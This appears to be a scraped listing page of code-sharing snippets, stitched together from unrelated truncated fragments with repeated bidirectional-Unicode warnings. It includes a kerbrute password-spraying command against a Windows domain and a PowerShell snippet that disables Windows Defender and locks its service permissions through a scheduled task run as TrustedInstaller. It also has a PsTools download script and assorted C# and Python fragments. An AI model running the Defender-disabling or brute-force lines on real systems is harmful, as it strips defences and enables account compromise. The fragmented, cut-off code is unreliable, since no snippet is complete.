PE Injection/Impersonation:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF | |
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT. | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" } | |
<# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<#---------------------------------------------------------------------------------------------------- | |
Release Notes: | |
v1.4: | |
Author: Jared Poeppelman, Microsoft | |
First version published on TechNet Script Gallery | |
----------------------------------------------------------------------------------------------------#> | |
function Test-Command | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Create PS folder on C: drive | |
New-Item -ItemType Directory -Force -Path "C:\PS" | |
# Set TLS versions for download (it will error otherwise) | |
[Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls" | |
# Download PsTools | |
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\PS\PSTools.zip" | |
# Extract PsTools to the PS folder | |
Expand-Archive -Path "C:\PS\PSTools.zip" -DestinationPath "C:\PS" | |
# Auto Accept EULA, can also run psexec with -accepteula | |
#reg ADD HKCU\Software\Sysinternals\PSexec /v EulaAccepted /t REG_DWORD /d 1 /f |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
caller_name = inspect.stack()[1].function | |
file_name = inspect.stack()[1].filename | |
line_number = inspect.stack()[1].lineno | |
self.logger.debug(f"Called from function: {caller_name} in file {file_name} at line {line_number}") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
NewerOlder